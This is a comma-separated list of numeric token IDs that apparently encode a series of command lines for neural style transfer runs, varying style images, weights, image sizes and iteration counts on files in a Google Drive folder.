62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
20,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
718,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
21,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
21,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
21,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
767,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
22,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
22,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
22,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
